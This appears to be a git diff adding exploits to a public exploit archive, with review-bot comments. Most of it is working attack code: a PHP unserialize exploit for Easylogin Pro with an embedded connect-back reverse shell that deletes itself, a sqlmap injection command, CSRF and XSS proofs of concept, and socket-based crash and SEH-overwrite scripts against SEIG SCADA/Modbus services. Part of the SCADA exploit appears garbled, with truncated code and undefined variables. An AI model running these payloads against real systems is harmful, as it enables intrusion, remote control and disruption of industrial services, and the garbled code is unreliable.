diff --git a/exploits/php/remote/45227.php b/exploits/php/remote/45227.php
new file mode 100644
index 000000000..6209e7b35
--- /dev/null
+++ b/exploits/php/remote/45227.php
@@ -0,0 +1,377 @@ +#!/usr/bin/php + -c +-t: target server (ip with or without port) +-c: connectback server (ip and port) +Example: +php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 +---------------------------------------------------- +mr_me@pluto:~$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337 + +Easylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability +bug found by: @f99942 +tekniq/exploit by: @steventseeley (mr_me) + +(+) snap... +(+) crackle... +(+) pop! +(+) connectback from 172.16.175.137 via port 41860 + +www-data@target:/var/www/html/uploads$ id;uname -a +uid=33(www-data) gid=33(www-data) groups=33(www-data) +Linux target 4.15.0-30-generic #32-Ubuntu SMP Thu Jul 26 17:42:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux +www-data@target:/var/www/html/uploads$ ls -la +total 12 +drwxrwxrwx 2 www-data www-data 4096 Aug 12 23:06 . +drwxr-xr-x 9 www-data www-data 4096 Aug 9 14:49 .. +-rwxrwxrwx 1 root root 13 Dec 12 2017 .gitignore +www-data@target:/var/www/html/uploads$ php --version +PHP 7.2.7-0ubuntu0.18.04.2 (cli) (built: Jul 4 2018 16:55:24) ( NTS ) +Copyright (c) 1997-2018 The PHP Group +Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies + with Zend OPcache v7.2.7-0ubuntu0.18.04.2, Copyright (c) 1999-2018, by Zend Technologies +www-data@target:/var/www/html/uploads$ +*/ + +namespace GuzzleHttp\Cookie; + +// change these to work against your target +$key = "OPudCtPyxzAGw8LkQowOoQAc88dvULGB"; +$path = "/var/www/html"; + +class Encrypter { + protected $key; + protected $cipher; + + public function __construct($key, $cipher = 'AES-256-CBC'){ + $key = (string) $key; + $this->key = $key; + $this->cipher = $cipher; + } + + public function encrypt($value, $serialize = true){ + $iv = random_bytes(openssl_cipher_iv_length($this->cipher)); + $value = openssl_encrypt( + $serialize ? 
serialize($value) : $value, + $this->cipher, $this->key, 0, $iv + ); + if ($value === false) { + throw new EncryptException('Could not encrypt the data.'); + } + $mac = $this->hash($iv = base64_encode($iv), $value); + $json = json_encode(compact('iv', 'value', 'mac')); + if (json_last_error() !== JSON_ERROR_NONE) { + throw new EncryptException('Could not encrypt the data.'); + } + return base64_encode($json); + } + + public function encryptString($value){ + return $this->encrypt($value, false); + } + + protected function hash($iv, $value){ + return hash_hmac('sha256', $iv.$value, $this->key); + } +} + +// pop chain +interface ToArrayInterface {} + +class SetCookie implements ToArrayInterface { + private $data; + + public function __construct(array $data = []){ + $this->data = $data; + } +} + +class CookieJar implements ToArrayInterface { + private $cookies; + + public function setCookie(SetCookie $cookie){ + $this->cookies = array($cookie); + } +} + +class FileCookieJar extends CookieJar { + private $filename; + + public function __construct($bd_file, $cbh, $cbp){ + $this->filename = $bd_file; + $this->setCookie(new SetCookie(array( + "Value" => '', + "Expires" => true, + "Discard" => false, + ))); + } +} + +class Exploit{ + private $target; + private $targetport; + private $cbhost; + private $cbport; + private $key; + private $path; + + public function __construct($t, $tp, $cbh, $cbp, $k, $p){ + $this->target = $t; + $this->targetport = $tp; + $this->cbhost = $cbh; + $this->cbport = $cbp; + $this->key = $k; + $this->path = $p; + } + + public function run(){ + + // its possible to leak the path if app.php contains 'debug' => true + // also, uploads is writable by default for avatars + $fcj = new FileCookieJar("$this->path/uploads/si.php", $this->cbhost, $this->cbport); + $e = new Encrypter($this->key); + $this->p = $e->encryptString(serialize($fcj)); + + // hardcoded md5 of the class name 'Hazzard\Auth\Auth' for the cookie login + $c = $this->do_get("index.php", 
array("Cookie: login_ac5456751dd3c394383a14228642391e=$this->p")); + if ($c === 500){ + print "(+) pop!\r\n"; + + // start our listener + $s = new Shell($this->cbport); + $s->start(); + + // msf reverse shell with some stuff modified + $rs = <<<'PHP' +@error_reporting(-1); +@set_time_limit(0); +@ignore_user_abort(1); +$dis=@ini_get('disable_functions'); +if(!empty($dis)){ + $dis=preg_replace('/[, ]+/', ',', $dis); + $dis=explode(',', $dis); + $dis=array_map('trim', $dis); +}else{ + $dis=array(); +} +$ipaddr='[cbhost]'; +$port=[cbport]; +function PtdSlhY($c){ + global $dis; + if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { + $c=$c." 2>&1\n"; + } + ob_start(); + system($c); + $o=ob_get_contents(); + ob_end_clean(); + if (strlen($o) === 0){ + $o = "NULL"; + } + return $o; +} +// we disappear like a fart in the wind +@unlink("si.php"); +$nofuncs='no exec functions'; +$s=@fsockopen("tcp://$ipaddr",$port); +while($c=fread($s,2048)){ + $out = ''; + if(substr($c,0,3) == 'cd '){ + chdir(substr($c,3,-1)); + }else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { + break; + }else{ + $out=PtdSlhY(substr($c,0,-1)); + if($out===false){ + fwrite($s, $nofuncs); + break; + } + } + fwrite($s,$out); +} +fclose($s); +PHP; + $rs = str_replace("[cbhost]", $this->cbhost, $rs); + $rs = str_replace("[cbport]", $this->cbport, $rs); + $php = base64_encode($rs); + $this->do_get("uploads/si.php", array("si: $php")); + } + } + + private function do_get($p = "index.php", array $h = []){ + $curl = curl_init(); + curl_setopt_array($curl, array( + CURLOPT_RETURNTRANSFER => 1, + CURLOPT_URL => "http://$this->target/$p", + CURLOPT_HTTPHEADER => $h, + CURLOPT_PORT => (int) $this->targetport + )); + $resp = curl_exec($curl); + return curl_getinfo($curl, CURLINFO_HTTP_CODE); + } +} + +class Shell extends \Thread{ + private $cbport; + + public function __construct($cbp){ + $this->cbport = $cbp; + } + + public function run(){ + $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); + $ret = 
@socket_bind($sock, 0, (int) $this->cbport); + $ret = @socket_listen($sock, 5); + $msgsock = @socket_accept($sock); + @socket_close($sock); + $start = true; + $fp = fopen("php://stdin", "r"); + while(false !== @socket_select($r = array($msgsock))){ + if ($start === true){ + if (socket_getpeername($r[0], $a, $p) === true){ + print "(+) connectback from $a via port $p\r\n"; + $s = $this->exec_cmd($msgsock, "echo `whoami`@`hostname`:\n"); + } + } + $start = false; + + // the pretty shells illusion + print "\r\n".$s.$this->exec_cmd($msgsock, "echo `pwd`\n")."$ "; + + // get our command... + $c = fgets($fp); + + // if the attacker enters nothing, continue... + if (strpos("\n", $c) === 0){ + continue; + } + if (strpos($c, "cd") === false){ + print $this->exec_cmd($msgsock, $c); + }elseif (strpos($c, "cd") !== false){ + $this->exec_cmd($msgsock, $c, false); + } + if(in_array($c, array("exit\n", "quit\n"))){ + break; + } + } + fclose($fp); + } + + private function exec_cmd($c, $cmd, $ret=true){ + + // send our command to the reverse shell + @socket_write($c, $cmd, strlen($cmd)); + + if ($ret == true){ + // we don't care to get the shell prompt back... + $resp = trim(@socket_read($c, 2048, PHP_BINARY_READ)); + if ($resp === "NULL"){ + return ""; + }else{ + return $resp; + } + } + } +} + +print_r("\r\nEasylogin Pro <= v1.3.0 Encryptor.php Unserialize Remote Code Execution Vulnerability +Bug found by: @f99942 +Tekniq/exploit by: @steventseeley (mr_me)\r\n"); + +if ($argc < 3) { +print_r(" +---------------------------------------------------- +Usage: php ".$argv[0]." -t -c +-t: target server (ip with or without port) +-c: connectback server (ip and port) +Example: +php ".$argv[0]." 
-t 172.16.175.136 -c 172.16.175.137:1337 +---------------------------------------------------- +"); die; } + +function set_args($argv) { + $_ARG = array(); + foreach ($argv as $arg) { + if (preg_match("/--([^=]+)=(.*)/", $arg, $reg)) { + $_ARG[$reg[1]] = $reg[2]; + } elseif(preg_match("/^-([a-zA-Z0-9])/", $arg, $reg)) { + $_ARG[$reg[1]] = "true"; + } else { + $_ARG["input"][] = $arg; + } + } + return $_ARG; +} + +$args = set_args($argv); +$host = $args["input"]["1"]; +$cbsp = $args["input"]["2"]; + +if (strpos($host, ":") == true){ + $host_and_port = explode(":", $host); + $host = $host_and_port[0]; + $port = $host_and_port[1]; +}else{ + $port = 80; +} + +if (strpos($cbsp, ":") == true){ + $cbhost_and_cbport = explode(":", $cbsp); + $cbhost = $cbhost_and_cbport[0]; + $cbport = $cbhost_and_cbport[1]; +}else{ + $cbport = 1337; +} + +$ip_regex = "(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b)"; +if ((preg_match($ip_regex, $host) === 1) && (preg_match($ip_regex, $cbhost) === 1)){ + + // exploit entry + $poc = new Exploit($host, $port, $cbhost, $cbport, $key, $path); + print "\r\n(+) snap...\r\n(+) crackle...\r\n"; + $poc->run(); +} +/* +eyJpdiI6InFGcWFDMW9aMEFwWmo2XC9RRkhxZ3JBPT0iLCJ2YWx1ZSI6IjdpVExUQWpaYVpu +RjVVRElxczg1YUVpSWl2bEtXOVwvY3BVaDFkc0NNY0Y4NkhMME9XNE9PZHJxc0FhUFBlenpi +VWtJSUNHWE9RYU5MQjVnOUgzUkt4RGc0QlE4TDNZSnpueFZlblVjM3NnVXFmeE0zSnZaRFA2 +a2gxU1l2QlVYNW5pUkZEd3c2RFJWYnpqRFkyUmdOQW5vZkVtaFA0Y2JDRW1kUU5mNWtGdmh3 +WDJWYlBmQU0rTkFwWExQOERWcEZDVTYzU255VEFaTzN4MzhZTEUxWElRbnNCZ1grWm9rN3Vh +MzBzSnYrSGpjMmlRRWMxZWVTbDVhN29uOG1RazBJIiwibWFjIjoiOThmYTM5ZDc3M2FlMGVh +NTI3ZWI2ZGNkODQ5N2ZmZmExNDA3YjdjYzYzMGRlODY3NDZmMjRkYTBiNmVjMGJmMCJ9 +*/ +?> \ No newline at end of file diff --git a/exploits/php/webapps/45221.txt b/exploits/php/webapps/45221.txt new file mode 100644 index 000000000..23aa25733 --- /dev/null +++ b/exploits/php/webapps/45221.txt 
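Review bot: The header comment documents usage and a sample session but not the preconditions that `run()` relies on, which is the first thing a defender triaging this entry needs. The forged `login_…` cookie is built with `$key`, so it presumably only passes the application's MAC check when that value matches the target's key, and the follow-up request only works if `$path/uploads/` is writable and serves `.php` files; I would state both above `$key`, e.g. `// preconditions: application key known; uploads/ writable and PHP-executable`, plus a `// fixed in: <version not stated on this page>` line. On the application side the corresponding hardening is to stop feeding cookie payloads to `unserialize()` (or pass `['allowed_classes' => false]`), rotate the key, and deny script execution under `uploads/`. In web logs the sequence this code produces is an HTTP 500 on `index.php` carrying a `login_` cookie, followed by a request for a newly created `.php` file under `uploads/` with an `si:` request header.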
@@ -0,0 +1,21 @@ +# Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection +# Exploit Author: Çlirim Emini +# Website: https://www.sentry.co.com +# Software Link: https://wordpress.org/plugins/chained-quiz/ +# Version/s: 1.0.8 and below +# Patched Version: 1.0.9 +# CVE : N/A +# WPVULNDB: https://wpvulndb.com/vulnerabilities/9112 + +# Vulnerability Description: +# WordPress Plugin Plugin Chained Quiz before 1.0.9 allows remote unauthenticated +# users to execute arbitrary SQL commands via the 'answer' and 'answers' parameters. + +# Technical details: +# Chained Quiz appears to be vulnerable to time-based SQL-Injection. +# The issue lies on the $answer backend variable. +# Privileges required: None + +# Proof of Concept (PoC): + +sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="answer=1*&question_id=1&quiz_id=1&post_id=1&question_type=radio&points=0&action=chainedquiz_ajax&chainedquiz_action=answer&total_questions=1" --dbms=MySQL --technique T \ No newline at end of file diff --git a/exploits/php/webapps/45224.txt b/exploits/php/webapps/45224.txt new file mode 100644 index 000000000..81f162fc2 --- /dev/null +++ b/exploits/php/webapps/45224.txt @@ -0,0 +1,29 @@ +# Exploit Title: MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery +# Date: 2018-05-17 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Software Link: https://community.mybb.com/mods.php?action=view&pid=1105 +# Version: 1.1 +# Tested on: Ubuntu 18.04 + +# 1. Description: +# The plugin allows moderators to save notes and display them in a list in the modCP. +# The CSRF allows an attacker to remotely delete all mod notes and mod note logs +# in the modCP & ACP. + +# 2. Proof of Concept: + + + + <-- Deletes mod note logs --> + + <-- Deletes mod notes --> + + + + + \ No newline at end of file diff --git a/exploits/php/webapps/45225.txt b/exploits/php/webapps/45225.txt new file mode 100644 index 000000000..90e822619 --- /dev/null +++ b/exploits/php/webapps/45225.txt 
@@ -0,0 +1,23 @@
+# Exploit Title: WordPress Plugin Tagregator 0.6 - Cross-Site Scripting
+# Date: 2018-05-05
+# Exploit Author: ManhNho
+# Vendor Homepage: https://wordpress.org/plugins/tagregator/
+# Software Link: https://downloads.wordpress.org/plugin/tagregator.0.6.zip
+# Ref: https://pastebin.com/ZGr5tyP2
+# Version: 0.6
+# Tested on: CentOS 6.5
+# CVE : CVE-2018-10752
+# Category : Webapps
+
+# 1. Description
+# WordPress Plugin Tagregator 0.6 - Stored XSS
+
+# 2. Proof of Concept
+
+1. Login to admin panel
+2. Access to Wordpress Tagregator setting, then choose Tweets/Instagram
+Media/Flickr Post/Google+ Activities and click "Add New" button
+3. In title field, inject XSS pattern such as:
+ and click Preview button
+4. This site will response url that will alert popup named xss
+5. Send this xss url to another administrators, we have same alert
\ No newline at end of file
diff --git a/exploits/php/webapps/45228.txt b/exploits/php/webapps/45228.txt
new file mode 100644
index 000000000..1e971bccb
--- /dev/null
+++ b/exploits/php/webapps/45228.txt
@@ -0,0 +1,34 @@
+############################################################################
+# Exploit Title: Countly-server Stored(Persistent) XSS Vulnerability
+# Date: Monday - 2018 13 August
+# Author: 10:10AM Team
+# Discovered By: Sleepy
+# Software Link: https://github.com/Countly/countly-server
+# Version: All Version
+# Category: Web-apps
+# Security Risk: Critical
+# Tested on: GNU/Linux Ubuntu 16.04 - win 10
+############################################################################
+# Exploit:
+# Description:
+#
+# Attacker can use multiple parameters in the provided link to inject his own data in the database
+# of this application,the injected data can then be directly viewed in the event logs panel
+# (manage>logger).
+# Attacker may use this vulnerability to inject his own payload for attacks like Stored XSS.
+# The injected payload will be executed everytime that the target page gets visited/refreshed.
+#
+# Proof of Concept:
+#
+# Injection URL:
+#
+# � http://[server_ip]:[api_port]/i?api_key=[api_key]¶meter_1=[payload_1]¶meter_2=[payload_2]&etc...
+#
+# Execution URL(login to server dashboard and navigate to "event logs" panel):
+#
+# � http://[server_ip]:[server_port]/dashboard#/[app_key]/manage/logger
+#
+#
+############################################################################
+# WE ARE: Sleepy({ssleeppyy@gmail.com}), Mikili({mikili.land@gmail.com})
+############################################################################
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45222.py b/exploits/windows_x86-64/dos/45222.py
new file mode 100755
index 000000000..7ae7f8581
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45222.py
@@ -0,0 +1,25 @@
+# Exploit Title: Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-19
+# Homepage: https://www.zortam.com
+# Software Link: https://www.zortam.com/download.html
+# Tested Version: 23.95
+# Tested on OS: Windows 7 x64
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program. Once inside of the program click "Continue". In the new window paste the content of
+# "exploit.txt" into the following field: "Select". Click "Ok" and you will see a crash.
+
+#!/usr/bin/python
+
+buffer = "A" * 2000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45223.py b/exploits/windows_x86-64/dos/45223.py
new file mode 100755
index 000000000..01fc28aca
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45223.py
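Review bot: The `#!/usr/bin/python` line sits after the comment header instead of on line 1, so it is an ordinary comment, and the file, committed with mode 100755, will not be handed to the intended interpreter when executed directly; 45223.py and 45226.py in this commit repeat the same layout. The body is also Python 2 only (`print "..."` statements), and the bare `except:` replaces whatever actually went wrong with the fixed text `File cannot be created`. I would move the shebang to the first line, add `# Requires: Python 2` to the header, and narrow the handler to `except IOError as e:` so the message can include `e`.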
@@ -0,0 +1,25 @@
+# Exploit Title: Restorator 1793 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-19
+# Homepage: https://www.bome.com/
+# Software Link: https://www.bome.com/bome/downloads/Restorator2018_Full_1793.exe
+# Tested Version: v1793
+# Tested on OS: Windows 7 x64
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program. In the new window paste the content of
+# "exploit.txt" into the following field: "Name". Click "Ok" and you will see a crash.
+
+#!/usr/bin/python
+
+buffer = "A" * 4000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45219.py b/exploits/windows_x86/dos/45219.py
new file mode 100755
index 000000000..73fa15ba1
--- /dev/null
+++ b/exploits/windows_x86/dos/45219.py
@@ -0,0 +1,31 @@
+# Title: SEIG Modbus 3.4 - Denial of Service (PoC)
+# Author: Alejandro Parodi
+# Date: 2018-08-17
+# Vendor Homepage: https://www.schneider-electric.com
+# Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4
+# Version: v3.4
+# Tested on: Windows7 x86
+# CVE: CVE-2013-0662
+# References:
+# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0662
+
+import socket
+import struct
+import time
+
+ip = "192.168.127.137"
+port = 27700
+con = (ip, port)
+
+header_padding = "\x00\xAA"
+header_buffer_size = "\xFF\xFF"
+header_recv_len = "\x08\xDD" #(header_buffer_size + 1 en el ultimo byte por que se le resta uno)
+header_end = "\xFF"
+
+header = header_padding + header_buffer_size + header_recv_len + header_end
+message = "\x00\x64" + "A" * 2267
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(con)
+s.send(header)
+s.send(message)
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45226.py b/exploits/windows_x86/dos/45226.py
new file mode 100755
index 000000000..1b67e8d69
--- /dev/null
+++ b/exploits/windows_x86/dos/45226.py
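Review bot: The header block names CVE-2013-0662 and the tested build but says nothing about remediation or exposure, so a reader cannot tell from this file whether an installation is still affected or which port to restrict. I would add `# Fixed in: <vendor-fixed version, not stated on this page>` and `# Exposure: TCP 27700 (the port this script connects to)` to the header. Separately, `struct` and `time` are imported and never used, the Spanish comment on `header_recv_len` should be in English like the rest of the header, and the socket is never closed. 45218.py in this commit likewise hard-codes a lab `ip`/`port` and carries no remediation line.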
@@ -0,0 +1,29 @@
+# Exploit Title: Prime95 29.4b7 - Denial Of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-20
+# Homepage: http://www.mersenne.org
+# Software Link: http://www.mersenne.org/ftp_root/gimps/p95v294b7.win32.zip
+# Tested Version: 29.4b7
+# Tested on OS: Windows 7 32-bit
+
+# Steps to Reproduce: Run the python exploit script, it will create a new
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program.
+# In the new window click "Test" > "PrimeNet" > "Connection..".
+# Now enter some test information into the fields until you reach the last field.
+# Paste the content of "exploit.txt" into the last field: "Optional proxy password".
+# Click "Ok" > "Ok" and you will see a crash.
+
+#!/usr/bin/python
+
+buffer = "A" * 6000
+
+payload = buffer
+try:
+ f=open("exploit.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/remote/45218.py b/exploits/windows_x86/remote/45218.py
new file mode 100755
index 000000000..6d359155f
--- /dev/null
+++ b/exploits/windows_x86/remote/45218.py
@@ -0,0 +1,67 @@ +# Title: SEIG SCADA SYSTEM 9 - Remote Code Execution +# Author: Alejandro Parodi +# Date: 2018-08-17 +# Vendor Homepage: https://www.schneider-electric.com +# Software Link: https://www.schneider-electric.ie/en/download/document/V9_Full_installation_package_register_and_receive_file/ +# Version: v9 +# Tested on: Windows7 x86 +# CVE: CVE-2013-0657 +# References: +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657 + +import socket +import struct + +ip = "192.168.0.23" +port = 12397 +con = (ip, port) + +# DoS Payload found in the research (CRUNCHBASE UNEXPECTED PARAMETER) +# length = "\x00\x70\x00\x00\x00\x00\x00\x00" +# message = "\x00\x70AA\x65\x00\x00\x00AAAAAAAAAAAAAAAA\x00\x00\x00\x00"+"B"*28644 +# payload = length+message + +# Exploit Magic +message_header = struct.pack("H", 0x6000) +padding = "B" * 3344 +eip_safeseh_bypass_address = struct.pack("H", len(message)) +header_end = "\x44" + +header = header_padding + header_buf_size + header_recv_len + header_end +########################## + +######## CRAFTING PAYLOAD ######## +payload = header + message +print "Package Len: "+hex(len(payload)) + " bytes" +################################## + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(con) +s.send(payload) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 59b8b72e2..6f2ce89f8 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -6055,6 +6055,10 @@ id,file,description,date,author,type,platform,port
 45215,exploits/windows/dos/45215.js,"Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
 45216,exploits/windows/dos/45216.js,"Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion",2018-08-17,"Google Security Research",dos,windows,
 45217,exploits/windows/dos/45217.js,"Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion",2018-08-17,"Google Security Research",dos,windows,
+45219,exploits/windows_x86/dos/45219.py,"SEIG Modbus 3.4 - Denial of Service (PoC)",2018-08-20,"Alejandro Parodi",dos,windows_x86,27700
+45222,exploits/windows_x86-64/dos/45222.py,"Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86-64,
+45223,exploits/windows_x86-64/dos/45223.py,"Restorator 1793 - Denial of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86-64,
+45226,exploits/windows_x86/dos/45226.py,"Prime95 29.4b7 - Denial Of Service (PoC)",2018-08-20,"Gionathan Reale",dos,windows_x86,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16700,6 +16704,9 @@ id,file,description,date,author,type,platform,port
 45193,exploits/windows/remote/45193.rb,"Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)",2018-08-13,Metasploit,remote,windows,7001
 45197,exploits/windows_x86-64/remote/45197.rb,"Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)",2018-08-14,"Raymond Wellnitz",remote,windows_x86-64,
 45210,exploits/linux/remote/45210.py,"OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)",2018-08-16,"Matthew Daley",remote,linux,
+45218,exploits/windows_x86/remote/45218.py,"SEIG SCADA System 9 - Remote Code Execution",2018-08-19,"Alejandro Parodi",remote,windows_x86,12397
+45220,exploits/windows_x86/remote/45220.py,"SEIG Modbus 3.4 - Remote Code Execution",2018-08-20,"Alejandro Parodi",remote,windows_x86,
+45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - Encryptor.php Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39817,3 +39824,7 @@ id,file,description,date,author,type,platform,port
 45206,exploits/php/webapps/45206.txt,"WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
 45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80
 45212,exploits/hardware/webapps/45212.py,"ADM 3.1.2RHG1 - Remote Code Execution",2018-08-17,"Matthew Fulton",webapps,hardware,443
+45221,exploits/php/webapps/45221.txt,"WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection",2018-08-20,"Çlirim Emini",webapps,php,80
+45224,exploits/php/webapps/45224.txt,"MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery",2018-08-20,0xB9,webapps,php,80
+45225,exploits/php/webapps/45225.txt,"WordPress Plugin Tagregator 0.6 - Cross-Site Scripting",2018-08-20,ManhNho,webapps,php,
+45228,exploits/php/webapps/45228.txt,"Countly - Persistent Cross-Site Scripting",2018-08-20,Sleepy,webapps,php,
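Review bot: The new 45228 row files Countly under platform `php` (and the advisory under `exploits/php/webapps/`), but the advisory's own Software Link is `github.com/Countly/countly-server`, which as far as I know is a Node.js application, so anyone filtering the index by platform to check their exposure will miss it; please confirm and re-file under the matching platform if so. In the second hunk the 45220 row leaves `port` empty while the sibling 45219 row for the same product records 27700. No file section for 45220.py is visible on this page, which may only be an artifact of how the page was captured, but is worth checking against the commit.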